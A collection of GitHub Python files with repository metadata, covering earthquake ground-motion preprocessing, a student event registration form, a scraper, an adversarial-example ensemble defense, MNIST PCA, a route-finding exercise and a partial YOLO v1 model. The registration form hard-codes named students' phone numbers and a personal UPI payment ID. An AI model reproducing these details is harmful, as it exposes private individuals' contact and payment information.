period=[10,7.5,5,4,3,2,1,0.5,0.2,0.1]\n \n Mwnga= dfnga[\"Earthquake Magnitude\"]\n vs30nga=np.array(dfnga[\"Vs30 (m/s) selected for analysis\"])\n latnga=dfnga[\"Station Latitude\"]\n longnga=dfnga[\"Station Longitude\"]\n hypolatnga=dfnga[\"Hypocenter Latitude (deg)\"]\n hypolonnga=dfnga[\"Hypocenter Longitude (deg)\"]\n hypodepthnga=dfnga[\"Hypocenter Depth (km)\"]\n rakenga=dfnga[\"Rake Angle (deg)\"]\n dipnga=dfnga[\"Dip (deg)\"]\n strikenga=dfnga[\"Strike (deg)\"]+180\n widthnga=dfnga[\"Fault Rupture Width (km)\"]\n \n rjbnga=dfnga[\"Joyner-Boore Dist. (km)\"]\n rxnga=dfnga[\"Rx\"]\n hypodisnga=dfnga[\"HypD (km)\"]\n distnga=dfnga[\"ClstD (km)\"]\n startdepthnga=dfnga[\"Depth to Top Of Fault Rupture Model\"]\n \n xinga = dfnga[\"X\"]\n \n # use avg cyershake values\n z10nga=dfnga[\"Northern CA/Southern CA - S4 Z1 (m)\"]\n z25nga=dfnga[\"Northern CA/Southern CA - S4 Z2.5 (m)\"]\n \n dipnga,rxnga = transform_dip(np.array(dipnga),np.array(rxnga))\n \n ztest = np.column_stack([Mwnga,distnga,vs30nga,z10nga,z25nga,rakenga,dipnga,hypodepthnga, widthnga,\n rjbnga,rxnga,startdepthnga, xinga,latnga,longnga,hypolatnga,hypolonnga])\n \n # feature_names=np.asarray(['Mw','Rrup','Vs30', 'Z1.0', 'Z2.5', 'Rake','Dip','Hypo_depth', 'Width',\n # 'Rjb','Rx','Ztor','Xi','latnga','longnga','hypolatnga','hypolonnga',])\n feature_names=np.asarray(['Earthquake Magnitude','ClstD (km)','Vs30 (m/s) selected for analysis', 'Northern CA/Southern CA - S4 Z1 (m)', 'Northern CA/Southern CA - S4 Z2.5 (m)', 'Rake Angle (deg)','Dip (deg)','Hypocenter Depth (km)', 'Fault Rupture Width (km)','Joyner-Boore Dist. (km)','Rx','Depth to Top Of Fault Rupture Model','X','Station Latitude','Station Longitude','Hypocenter Latitude (deg)','Hypocenter Longitude (deg)',])\n \n lus1=dfnga[\"Lowest Usable Freq - H1 (Hz)\"]\n lus2=dfnga[\"Lowest Usable Freq - H2 (H2)\"]\n mm=np.max([lus1,lus2],axis=0)\n mmt=1./mm\n \n for k in range(nga_GM.shape[0]):\n indices = [i for i,v in enumerate(period >= mmt[k]) if v]\n nonnan=np.zeros(nga_GM.shape[1])\n \n for k in range(nga_GM.shape[1]): \n nonnan[k]=np.count_nonzero(~np.isnan(nga_GM[:,k]))\n \n f1=plt.figure('Records at frequency2',figsize=(5,5))\n plt.semilogx(period,nonnan)\n plt.xlabel('Period (s)')\n plt.ylabel('Count')\n plt.title('Number of Accurate Records (PEER)')\n plt.grid()\n \n #'Mw','Rrup','Vs30', 'Z1.0' all greater than -200?\n for i in range(0,4+1):\n index=(ztest[:,i]>-200)\n ztest=ztest[index]\n print(ztest.shape)\n nga_GM=nga_GM[index]\n print (i,ztest.shape,i)\n \n #first SA values greater than 0\n index=(nga_GM[:,0]>0.0)\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,6)\n \n #seconds SA values greater than 0\n index=(nga_GM[:,1]>0.0)\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,7)\n \n #added magnitude above 5.9 here\n index=(ztest[:,0]>2.9)\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,7)\n \n #distance max of 200km\n index=(ztest[:,1]<200)\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,7)\n \n #vs30=500-710\n index=(ztest[:,2]>300)# & (ztest[:,2]<710))\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,7)\n \n #z10max=900\n index=(ztest[:,3]<900)\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,7)\n \n #z25max=5350\n index=(ztest[:,4]<5350)\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,7)\n \n index=(ztest[:,5]>5)\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,13)\n \n #lat= 33.45402,35.21083\n index=((ztest[:,13]>= 33.45) & (ztest[:,13]<=35.21))\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,7)\n \n #lon= -120.8561, -116.4977\n index=((ztest[:,14]>= -120.8561) & (ztest[:,14]<= -116.4977))\n ztest=ztest[index]\n nga_GM=nga_GM[index]\n print(ztest.shape,7)\n \n for i in range(0,len(period)):\n index=(nga_GM[:,i]>-200)\n ztest=ztest[index]\n print(ztest.shape)\n nga_GM=nga_GM[index]\n print (i,ztest.shape,i)\n \n # in units of g\n nga_GM = np.log(9.81*nga_GM)#now in units of ln(m/s2)\n model_avg = gmpe_avg(ztest)\n NGA_targets = nga_GM - model_avg\n \n ztestdf = pd.DataFrame(data=ztest, columns=feature_names)\n GMdf = pd.DataFrame(data=nga_GM, columns=periodnames)\n ngatargetdf = pd.DataFrame(data=NGA_targets, columns=[(periodnames[i] + 'resid') for i in range(len(periodnames))])\n #save to df\n dfsave = pd.concat([ztestdf,GMdf,ngatargetdf],axis=1)\n dfsave.to_csv('/Users/aklimasewski/Documents/data/NGA_mag2_9.csv')\n\n#%%\n\ndef readindataNGA(filename,n=13):\n '''\n \n Parameters\n ----------\n filename: name of NGA file\n n: number of model parameters\n\n Returns\n nga_data1: numpy array of nga features\n nga_targets1: numpy array of nga targets\n feature_names: list of feature names\n '''\n \n import sys\n import os\n sys.path.append(os.path.abspath('/Users/aklimasewski/Documents/python_code_nonergodic'))\n from preprocessing import transform_dip\n import pandas as pd\n \n # name = '/Users/aklimasewski/Documents/data/Updated_NGA_West2_Flatfile_RotD50_d050_public_version.csv'\n dfnga = pd.read_csv(filename,index_col=0) \n\n # latmin=33,latmax=36.0,lonmin=-120.5,lonmax=-115.7\n # if region == True:\n # stlat = (dfnga[\"Station Latitude\"] >=33) & (dfnga[\"Station Latitude\"] <=36)\n # stlon = (dfnga[\"Station Longitude\"] >=-120.5) & (dfnga[\"Station Longitude\"] <=-115.7)\n # evlat = (dfnga[\"Hypocenter Latitude (deg)\"] >=33) & (dfnga[\"Hypocenter Latitude (deg)\"] <=36)\n # evlon = (dfnga[\"Hypocenter Longitude (deg)\"] >=-120.5) & (dfnga[\"Hypocenter Longitude (deg)\"] <=-115.7)\n # dfnga = dfnga[(stlat & stlon & evlat & evlon)] \n \n Mwnga= dfnga[\"Earthquake Magnitude\"]\n \n vs30nga=np.array(dfnga[\"Vs30 (m/s) selected for analysis\"])\n \n latnga=dfnga[\"Station Latitude\"]\n longnga=dfnga[\"Station Longitude\"]\n hypolatnga=dfnga[\"Hypocenter Latitude (deg)\"]\n hypolonnga=dfnga[\"Hypocenter Longitude (deg)\"]\n hypodepthnga=dfnga[\"Hypocenter Depth (km)\"]\n rakenga=dfnga[\"Rake Angle (deg)\"]\n dipnga=dfnga[\"Dip (deg)\"]\n # strikenga=dfnga[\"Strike (deg)\"]+180\n widthnga=dfnga[\"Fault Rupture Width (km)\"]\n \n #targets\n periodnames = ['T10.000Sresid','T7.500Sresid','T5.000Sresid','T4.000Sresid','T3.000Sresid','T2.000Sresid','T1.000Sresid','T0.200Sresid','T0.500Sresid','T0.100Sresid']\n residtesttemp=dfnga.loc[:, periodnames]\n nga_targets1=residtesttemp.values\n \n # lengthtrain=dfnga[\"Length\"]\n rjbnga=dfnga[\"Joyner-Boore Dist. (km)\"]\n rxnga=dfnga[\"Rx\"]\n # rytrain=dftrain[\"ry\"]\n # hypodisnga=dfnga[\"HypD (km)\"]\n distnga=dfnga[\"ClstD (km)\"]\n\n startdepthnga=dfnga[\"Depth to Top Of Fault Rupture Model\"]\n \n xinga = dfnga[\"X\"]\n \n # distnga = hypodisnga\n #use avg cyershake values\n z10nga=dfnga[\"Northern CA/Southern CA - S4 Z1 (m)\"]\n z25nga=dfnga[\"Northern CA/Southern CA - S4 Z2.5 (m)\"]\n \n dipnga,rxnga = transform_dip(np.array(dipnga),np.array(rxnga))\n \n \n if n ==12:\n nga_data1 = np.column_stack([Mwnga,distnga,vs30nga,z10nga,z25nga,rakenga,dipnga,hypodepthnga, widthnga,\n rjbnga,rxnga,startdepthnga])\n \n feature_names=np.asarray(['Mw','Rrup','Vs30', 'Z1.0', 'Z2.5', 'Rake','Dip','Hypo_depth', 'Width',\n 'Rjb','Rx','Ztor',])\n elif n==13:\n nga_data1 = np.column_stack([Mwnga,distnga,vs30nga,z10nga,z25nga,rakenga,dipnga,hypodepthnga, widthnga,\n rjbnga,rxnga,startdepthnga, xinga])\n \n feature_names=np.asarray(['Mw','Rrup','Vs30', 'Z1.0', 'Z2.5', 'Rake','Dip','Hypo_depth', 'Width',\n 'Rjb','Rx','Ztor','Xi',])\n \n #omit all records without targets\n # rows, cols = np.where(nga_targets1 == (-999.0))\n # rows = list(set(rows))\n # nga_targets1 = np.delete(nga_targets1,rows,axis=0)\n # nga_data1 = np.delete(nga_data1,rows,axis=0)\n \n #NGA targets\n \n return nga_data1, nga_targets1, feature_names\n\n\ndef add_locfeatNGA(filename, train_data1,feature_names):\n \n '''\n add station and hypocenter lat, lon\n \n Parameters\n ----------\n filename: name of NGA file\n n: number of model parameters\n\n Returns\n nga_data1: numpy array of nga features\n nga_targets1: numpy array of nga targets\n feature_names: list of feature names\n '''\n import numpy as np\n import pandas as pd\n\n dfnga = pd.read_csv(filename) \n \n latnga=dfnga[\"Station Latitude\"]\n longnga=dfnga[\"Station Longitude\"]\n hypolatnga=dfnga[\"Hypocenter Latitude (deg)\"]\n hypolonnga=dfnga[\"Hypocenter Longitude (deg)\"]\n\n train_data1_4 = np.column_stack([latnga, longnga, hypolatnga, hypolonnga])\n feature_names_4=np.asarray(['stlat', 'stlon', 'hypolat','hypolon'])\n \n train_data1 = np.concatenate([train_data1,train_data1_4], axis = 1)\n feature_names = np.concatenate([feature_names,feature_names_4], axis = 0)\n \n return train_data1, feature_names\n\n\ndef add_azNGA(filename, train_data1,feature_names):\n '''\n add forward aziumth as feature\n \n Parameters\n ----------\n filename: name of NGA file\n n: number of model parameters\n\n Returns\n nga_data1: numpy array of nga features\n nga_targets1: numpy array of nga targets\n feature_names: list of feature names\n '''\n #calculats forward azimuth between event and station and adds to training and testing data\n import pyproj\n import numpy as np\n \n geodesic = pyproj.Geod(ellps='WGS84')\n \n # filename = '/Users/aklimasewski/Documents/data/NGAWest2region.csv'\n # filename = '/Users/aklimasewski/Documents/data/NGAWest2region_clean.csv'\n \n dfnga = pd.read_csv(filename) \n \n latnga=dfnga[\"Station Latitude\"]\n longnga=dfnga[\"Station Longitude\"]\n hypolatnga=dfnga[\"Hypocenter Latitude (deg)\"]\n hypolonnga=dfnga[\"Hypocenter Longitude (deg)\"]\n\n train_data1_4 = np.column_stack([latnga, longnga, hypolatnga, hypolonnga])\n feature_names_4=np.asarray(['stlat', 'stlon', 'hypolat','hypolon'])\n \n #station lat lon and event lat lon\n az12,az21,distance = geodesic.inv(train_data1_4[:,3],train_data1_4[:,2],train_data1_4[:,1],train_data1_4[:,0])\n\n #add the path features\n train_data1 = np.concatenate([train_data1,az12.reshape(len(az12),1)], axis = 1)\n feature_names = np.concatenate([feature_names,np.asarray(['forward_az'])], axis = 0)\n \n return train_data1, feature_names\n\ndef add_midpointNGA(filename, train_data1, feature_names):\n '''\n add path midpoin lat, lon as feature\n \n Parameters\n ----------\n filename: name of NGA file\n n: number of model parameters\n\n Returns\n nga_data1: numpy array of nga features\n nga_targets1: numpy array of nga targets\n feature_names: list of feature names\n '''\n \n #calculated midpoint lat, lon between event and station and adds to training and testing data\n import numpy as np\n \n # filename = '/Users/aklimasewski/Documents/data/NGAWest2region.csv'\n # filename = '/Users/aklimasewski/Documents/data/NGAWest2region_clean.csv'\n \n dfnga = pd.read_csv(filename) \n \n latnga=dfnga[\"Station Latitude\"]\n longnga=dfnga[\"Station Longitude\"]\n hypolatnga=dfnga[\"Hypocenter Latitude (deg)\"]\n hypolonnga=dfnga[\"Hypocenter Longitude (deg)\"]\n\n train_data1_4 = np.column_stack([latnga, longnga, hypolatnga, hypolonnga])\n feature_names_4=np.asarray(['stlat', 'stlon', 'hypolat','hypolon'])\n \n #station lat lon and event lat lon\n midpoint = np.asarray([(train_data1_4[:,0]+train_data1_4[:,2])/2.,(train_data1_4[:,1]+train_data1_4[:,3])/2.]).T\n\n #add the path features\n train_data1 = np.concatenate([train_data1,midpoint], axis = 1)\n feature_names = np.concatenate([feature_names,np.asarray(['midpointlat','midpointlon'])], axis = 0)\n \n return train_data1, feature_names\n","repo_name":"aklimase/nonergodic_pathANN","sub_path":"readNGA.py","file_name":"readNGA.py","file_ext":"py","file_size_in_byte":13322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"5337791655","text":"import streamlit as st\r\nfrom PIL import Image\r\n\r\ndef registration_form():\r\n st.title(\"ANIRVEDA'S IPL Auction 2023\")\r\n st.write(\"💫 Greetings PDEU!! 💫\")\r\n st.write(\"Gear up for the most thrilling event of the academic calendar! 🎉\")\r\n st.write(\"The ✨ IPL auction ✨ is just a few days away, and it promises to be an unforgettable experience.\")\r\n st.write(\"This is your chance to step into the shoes of team owners and strategize like the pros🫱🏻‍🫲🏻\")\r\n st.write(\"Remember, it's not just about picking the best players; it's about managing your budget wisely and building a balanced squad. 💰🏏\")\r\n st.write(\"Will you go all-in for a star player or opt for emerging talent with potential? The choice is yours! 🌟🌟\")\r\n st.write(\"Assemble your team of cricket enthusiasts, polish your auctioneer skills, and prepare for a rollercoaster ride of bidding wars, unexpected twists, and strategic maneuvers. 🔄✨💼\")\r\n st.write(\"For more details, join the WhatsApp group:\")\r\n st.write(\"https://chat.whatsapp.com/BCovv8RfVUBGs0PMHhfnzA\")\r\n st.write(\"\")\r\n st.write(\"\")\r\n st.write(\"Please fill in the following details to register:\")\r\n\r\n # Input fields\r\n name = st.text_input(\"Name:\", key=\"name\")\r\n roll_number = st.text_input(\"Roll Number:\", key=\"roll_number\")\r\n\r\n # Dropdown for Year of Study\r\n year_of_study_options = ['1st year', '2nd year', '3rd year', '4th year']\r\n year_of_study = st.selectbox(\"Year of Study:\", year_of_study_options, key=\"year_of_study\")\r\n\r\n # Dropdown for School\r\n school_options = ['SOT', 'SLS', 'SPT', 'SOET']\r\n school = st.selectbox(\"School:\", school_options, key=\"school\")\r\n\r\n \r\n\r\n st.header(\"Team Details\")\r\n team_name = st.text_input(\"Team Name:\", key=\"team_name\")\r\n\r\n st.header(\"Player Details\")\r\n\r\n # Player 1 (Team Leader)\r\n st.subheader(\"Player 1 (Team Leader)\")\r\n player1_name = st.text_input(\"Name:\", key=\"player1_name\")\r\n player1_roll_number = st.text_input(\"Roll Number:\", key=\"player1_roll_number\")\r\n player1_contact = st.text_input(\"Contact Number (WhatsApp):\", key=\"player1_contact\")\r\n player1_email = st.text_input(\"Email:\", key=\"player1_email\")\r\n\r\n # Player 2\r\n st.subheader(\"Player 2\")\r\n player2_name = st.text_input(\"Name:\", key=\"player2_name\")\r\n player2_roll_number = st.text_input(\"Roll Number:\", key=\"player2_roll_number\")\r\n player2_contact = st.text_input(\"Contact Number (WhatsApp):\", key=\"player2_contact\")\r\n player2_email = st.text_input(\"Email:\", key=\"player2_email\")\r\n\r\n # Player 3\r\n st.subheader(\"Player 3\")\r\n player3_name = st.text_input(\"Name:\", key=\"player3_name\")\r\n player3_roll_number = st.text_input(\"Roll Number:\", key=\"player3_roll_number\")\r\n player3_contact = st.text_input(\"Contact Number (WhatsApp):\", key=\"player3_contact\")\r\n player3_email = st.text_input(\"Email:\", key=\"player3_email\")\r\n\r\n # Player 4\r\n st.subheader(\"Player 4\")\r\n player4_name = st.text_input(\"Name:\", key=\"player4_name\")\r\n player4_roll_number = st.text_input(\"Roll Number:\", key=\"player4_roll_number\")\r\n player4_contact = st.text_input(\"Contact Number (WhatsApp):\", key=\"player4_contact\")\r\n player4_email = st.text_input(\"Email:\", key=\"player4_email\")\r\n\r\n \r\n # Registration Fees\r\n st.header(\"Registration Fees\")\r\n st.write(\"If you have mode of payment as online pay using the following qr code or via the upi id: ritikaadhiya21@oksbi\")\r\n st.write(\"If you have mode of payment as cash, please contact the following numbers: \")\r\n st.write(\"Rajat Agrawal: 9664981455\")\r\n st.write(\"Sumer Pandey: 9979878903\")\r\n st.write(\"Registration Fees: RS50 per team\")\r\n registration_fees = 50\r\n st.write(f\"Total Registration Fees: {registration_fees}\")\r\n\r\n # Payment Instructions Image\r\n payment_instructions_image = Image.open(\"payment.jpg\")\r\n st.image(payment_instructions_image, caption=\"Payment Instructions:\", use_column_width=True)\r\n\r\n # Screenshot Upload\r\n st.write(\"Please upload a screenshot as proof of payment:\")\r\n screenshot = st.file_uploader(\"Upload Screenshot (JPG or PNG)\", type=[\"jpg\", \"png\"], key=\"screenshot\", accept_multiple_files=False)\r\n\r\n # Queries\r\n queries = st.text_area(\"Do you have any queries or special requests? (Optional):\", key=\"queries\")\r\n\r\n # Submit button\r\n if st.button(\"Submit\"):\r\n try:\r\n # Validate required fields\r\n if not all([\r\n name, roll_number, year_of_study, school, team_name,\r\n player1_name, player1_roll_number, player1_contact, player1_email\r\n ]):\r\n st.error(\"Please fill in all the required fields.\")\r\n elif not screenshot:\r\n st.error(\"Please upload a screenshot as proof of payment.\")\r\n else:\r\n # Save the screenshot as proof\r\n screenshot.save(\"payment_proof.png\")\r\n\r\n st.success(\"Registration Successful!\")\r\n # You can add code to submit the registration details and the payment proof to a database or another service here.\r\n\r\n except Exception as e:\r\n st.error(\"An error occurred during registration. Please try again later.\")\r\n st.error(str(e))\r\n\r\nif __name__ == \"__main__\":\r\n registration_form()\r\n","repo_name":"RajatAgrawal117/AV_IPL_Form","sub_path":"IPLForm.py","file_name":"IPLForm.py","file_ext":"py","file_size_in_byte":5322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70553229801","text":"import requests\nimport os\nfrom bs4 import BeautifulSoup\n\nurl = \"https://www.jobindex.dk/jobsoegning?q=Python\"\npage = requests.get(url)\n\nsoup = BeautifulSoup(page.content, \"html.parser\")\n\nresults = soup.find(id=\"result_list_box\")\n\njob_elements = results.find_all(\"div\", class_=\"PaidJob-inner\")\n\nfor job_element in job_elements:\n title_elemet = job_element.find(\"b\")\n print(title_elemet.text.strip())\n\n# Link: https://realpython.com/beautiful-soup-web-scraper-python/\n\n\n\n\n#class = PaidJob-inner\n#","repo_name":"ChristinaBartholomaeussen/pythonSessions","sub_path":"Session5_UtilitiesAndModules/Ex5_BuildAWebScraperWithPython/webscraper.py","file_name":"webscraper.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36281695381","text":"import os\nimport sys\nimport time\n\nimport numpy as np\n\nfrom utils.config import *\nfrom utils.util import *\n\ndef usage():\n print(\"=======================================================================================\")\n print(\"python inputImagesFP modelsDir experimentRootDir datasetName numOfClasses\")\n print(\"=======================================================================================\")\n\nif len(sys.argv) != 6:\n usage()\n exit(1)\n\n\ninputImagesFP = sys.argv[1]\nmodelsDir = sys.argv[2]\nexperimentRootDir = sys.argv[3]\ndatasetName = sys.argv[4]\nnumOfClasses = int(sys.argv[5])\n\nDATA.set_current_dataset_name(datasetName)\n\n# Basic parameters for k-fold experiment setup\narchitecture = MODEL.ARCHITECTURE\nAETypes = ATTACK.get_AETypes()\nnumOfAETypes = len(AETypes)\n\ntargetModelName = \"clean\"\ntransformConfig = TRANSFORMATION()\ntransformationList = transformConfig.supported_types() \ntransformationList = transformationList[1:] # exclude the 'clean' transformation - no transformation\n\n\n# Load models and create models to output logits\nmodelFilenamePrefix = datasetName+\"-\"+architecture\nmodels, logitsModels = loadModels(modelsDir, modelFilenamePrefix, transformationList)\n\n\n# Prediction\ninputSamples = np.load(inputImagesFP)\nnumOfSamples = inputSamples.shape[0]\nnumOfTrans = len(transformationList)\npredShape = (numOfTrans, numOfSamples, numOfClasses)\npredProb = np.zeros(predShape)\npredLogits = np.zeros(predShape)\n\nfor modelID in range(numOfTrans):\n transformType = transformationList[modelID]\n print(\"\\t\\t\\t [{}] prediction on {} model\".format(modelID, transformType))\n # Transformation cost\n tranSamples = transform_images(inputSamples, transformType)\n\n # model prediction cost - using probability-based defense\n predProb[modelID, :, :], _ = prediction(\n tranSamples,\n models[modelID])\n # model prediction cost - using logits-based defense\n predLogits[modelID, :, :], _ = prediction(\n tranSamples,\n logitsModels[modelID])\n\n\npredProbLC = np.zeros((predProb.shape[0], predProb.shape[1], 2))\npredProbLC[:, :, 0] = np.argmax(predProb, axis=2)\npredProbLC[:, :, 1] = np.max(predProb, axis=2)\n\ntrainModelDir = os.path.join(experimentRootDir, \"train_models\")\nnewLabelsDir = os.path.join(experimentRootDir, \"newLabels\")\ncreateDirSafely(newLabelsDir)\nnumOfDefenses = numOfCVDefenses+2*numOfWCDefenses\n# Test each ensemble model trained by each type of AEs\nfor AETypeIdx in range(numOfAETypes):\n AEType = AETypes[AETypeIdx]\n curTrainModelDir = os.path.join(trainModelDir, AEType)\n curNewLabelsDir = os.path.join(newLabelsDir, AEType)\n createDirSafely(curNewLabelsDir)\n\n print(\"Collecting new labels from the ensemble models built upon \"+AEType)\n\n # accuracy of clustering-and-voting based defenses\n for defenseIdx in range(numOfCVDefenses):\n defenseName = cvDefenseNames[defenseIdx] \n newLabelsFilename = defenseName+\"_newLabels.npy\"\n clusters = loadCAVModel(os.path.join(curTrainModelDir, defenseName+\".txt\"))\n\n # getting new labels\n votedResults, _ = votingAsDefense(\n predProbLC,\n clusters,\n vsac=cvDefenseNames[defenseIdx],\n measureTC=False)\n newLabels = votedResults[:, 0]\n np.save(os.path.join(curNewLabelsDir, newLabelsFilename), newLabels)\n\n\n # accuracy of weithed-confidence based defenses\n for defenseIdx in range(numOfWCDefenses):\n defenseName = wcDefenseNames[defenseIdx]\n for plIdx in range(2):\n wcMatFilename = defenseName+\"_EM.npy\"\n mIDsFilename = defenseName+\"_modelIDs.npy\"\n newLabelsFilename = defenseName+\"_newLabels.npy\"\n pred = predProb\n if plIdx == 1: # predict logit instead of probability\n wcMatFilename = \"LG_\" + wcMatFilename\n mIDsFilename = \"LG_\" + mIDsFilename\n newLabelsFilename = \"LG_\" + newLabelsFilename\n pred = predLogits\n\n wcMat = np.load(os.path.join(curTrainModelDir, wcMatFilename))\n # ID of transform models: starts from 0.\n mIDs = np.load(os.path.join(curTrainModelDir, mIDsFilename))\n \n curPred = pred[mIDs] \n\n # getting new labels\n predLabels, _ = wcdefenses(\n curPred, wcMat, defenseName, measureTC=False)\n\n newLabels = predLabels\n np.save(os.path.join(curNewLabelsDir, newLabelsFilename), newLabels)\n\n","repo_name":"nybupt/athena","sub_path":"src/data/generate_data_from_ensemble_models.py","file_name":"generate_data_from_ensemble_models.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71131054759","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.decomposition import PCA\nimport random \n\nwith open('t10k-labels-idx1-ubyte','rb') as lbpath:\n labels = np.frombuffer(lbpath.read(), dtype=np.uint8,\n offset=8)\n \nwith open('t10k-images-idx3-ubyte','rb') as imgpath:\n images = np.frombuffer(imgpath.read(), dtype=np.uint8,\n offset=16).reshape(len(labels), 784)\n\ncolors = ['b','g','r','c','m','y','k','tab:gray','lime','orange']\n\n\npcs = PCA(n_components=185).fit(images)\n\nprint(f'nuumber of principal components={185}', 'explained variance ratio=',np.sum(pcs.explained_variance_ratio_))\n\nt_images = pcs.transform(images)\nre_images = pcs.inverse_transform(t_images)\n\nfig, axs = plt.subplots(3, 2)\nfig.tight_layout()\nfor i in range(3):\n x = random.randint(0,10000)\n axs[i,0].imshow(images[x,:].reshape(28,28),cmap='gray')\n axs[i,0].set_title('Original',size=10)\n axs[i,1].imshow(re_images[x,:].reshape(28,28),cmap='gray')\n axs[i,1].set_title('Reconstructed',size=10)\nplt.show()\n","repo_name":"fardinayar/SPR","sub_path":"HW4/7/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20107034736","text":"# stack 활용\n# 처음에 bfs로 시도했지만, bfs로 풀다보면 출발점이 같을 때 목적지가 여러곳일 경우가 있어\n# 예외처리 하기 힘이든다,,\n# 대부분의 풀이들은 dfs 또는 stack을 활용..\n\ndef solution(tickets):\n answer = []\n # stack을 활용하기 위해 역순으로 sort (문제의 조건 : 알파벳 순)\n tickets.sort(reverse=True)\n route = dict()\n for st,ed in tickets:\n # dict에 있는 경우\n if st in route:\n route[st].append(ed)\n #value를 list로 만든다\n else:\n route[st] = [ed]\n print(route)\n \n # stack\n stack = ['ICN']\n \n while stack:\n now = stack[-1]\n\n # now가 route에 없거나 route(목적지)가 비었을 경우\n if now not in route or len(route[now])==0:\n answer.append(stack.pop())\n else:\n stack.append(route[now].pop())\n # stack으로 빼줬기 때문에 다시 reverse\n answer.reverse()\n return answer","repo_name":"yuiseo/ProblemSolving","sub_path":"프로그래머스/lv3/43164. 여행경로/여행경로.py","file_name":"여행경로.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27692947708","text":"# -*- coding=utf-8 -*-\n\n\"\"\"\nCreate yolo_v1 model.\n\nDate: 2018/03/21\nAuthor: lvhao\n\"\"\"\n\nimport numpy as np\nfrom keras.layers import Conv2D, LeakyReLU, MaxPooling2D, Dense, Flatten, Dropout\nfrom keras.models import Model\n\n\ndef conv2d_LeakyReLU(inputs, filters, alpha, kernel=(3, 3), strides=(1, 1)):\n \"\"\"\n Do 2d-conv with LeakyReLU.\n :param inputs: Input tensor of shape (samples, rows, cols, 3)\n :param filters: Integer, the number of kernels.\n :param kernel: kernel size.\n :param strides: strides.\n :return: Output tensor block.\n \"\"\"\n\n x = Conv2D(filters, kernel, strides=strides, padding='same')(inputs)\n x = LeakyReLU(alpha)(x)\n\n return x\n\n\ndef check_input_shape(inputs):\n \"\"\"\n Check inputs' type and shape.\n Raise ValueError.\n :return: None\n \"\"\"\n\n shape = inputs.shape\n if len(shape) != 4:\n raise ValueError('Input shape is not proper!')\n\n if shape[1] != 448 or shape[2] != 448 or shape[3] != 3:\n raise ValueError('Input shape should be 448x448x3!')\n\n\ndef YOLOV1(inputs):\n \"\"\"\n Build YOLO v1 network.\n :param inputs: images of shape (samples, rows, cols, channels)\n :return:\n \"\"\"\n check_input_shape(inputs)\n\n alpha = 0.1\n\n x = conv2d_LeakyReLU(inputs, 64, alpha, (7, 7), strides=2)\n x = MaxPooling2D(pool_size=(2, 2), strides=2)(x)\n print(x.shape)\n\n x = conv2d_LeakyReLU(x, 192, alpha, (3, 3))\n x = MaxPooling2D(pool_size=(2, 2), strides=2)(x)\n print(x.shape)\n\n x = conv2d_LeakyReLU(x, 128, alpha, (1, 1))\n x = conv2d_LeakyReLU(x, 256, alpha, (3, 3))\n x = conv2d_LeakyReLU(x, 256, alpha, (1, 1))\n x = conv2d_LeakyReLU(x, 512, alpha, (3, 3))\n x = MaxPooling2D(pool_size=(2, 2), strides=2)(x)\n print(x.shape)\n\n for _ in range(4):\n x = conv2d_LeakyReLU(x, 256, alpha, (1, 1))\n x = conv2d_LeakyReLU(x, 512, alpha, (3, 3))\n x = conv2d_LeakyReLU(x, 512, alpha, (1, 1))\n x = conv2d_LeakyReLU(x, 1024, alpha, (3, 3))\n x = MaxPooling2D(pool_size=(2, 2), strides=2)(x)\n print(x.shape)\n\n for _ in range(2):\n x = conv2d_LeakyReLU(x, 512, alpha, (1, 1))\n x = conv2d_LeakyReLU(x, 1024, alpha, (3, 3))\n x = conv2d_LeakyReLU(x, 1024, alpha, (3, 3))\n x = conv2d_LeakyReLU(x, 1024, alpha, (3, 3), strides=2)\n print(x.shape)\n\n x = conv2d_LeakyReLU(x, 1024, alpha, (3, 3))\n x = conv2d_LeakyReLU(x, 1024, alpha, (3, 3))\n print(x.shape)\n\n x = Flatten(name='flatten')(x)\n x = Dense(4096, name='fc1')(x)\n x = LeakyReLU(alpha)(x)\n x = Dropout(0.5)(x)\n print(x.shape)\n\n x = Dense(7 * 7 * 30, name='fc2')(x)\n print(x.shape)\n\n model = Model(inputs, x, name='YOLO_v1')\n\n return model\n\ndef loss(y_true, y_pred, lambda_c=5, lambda_n=0.5):\n \"\"\"\n Calculate loss\n :param y_true: ground truth\n :param y_pred: predicted output\n :param lambda_c: loss weight of position item\n :param lambda_n: loss weight of no obj item\n :return: final loss\n \"\"\"\n\n grid_side = 7\n grid_len = 448//grid_side\n bbox_num = 2\n\n # create I to define which grid has object\n I_i = np.zeros([grid_side, grid_side])\n for y_true_data in y_true:\n posi = y_true_data['pos']\n _x, _y, _w, _h = posi[0],posi[1],posi[2],posi[3]\n I_i[_y//grid_len:(_y + _h)//grid_len + 1,\n _x//grid_len:(_x + _w)//grid_len + 1] = 1\n\n #\n\n return\n\n\n\n\n\n\n\n","repo_name":"Jadecity/KerasPrj","sub_path":"YOLO_v1/yolo_v1.py","file_name":"yolo_v1.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8937119255","text":"\"\"\"\nLane-finding pipeline\n\"\"\"\nimport 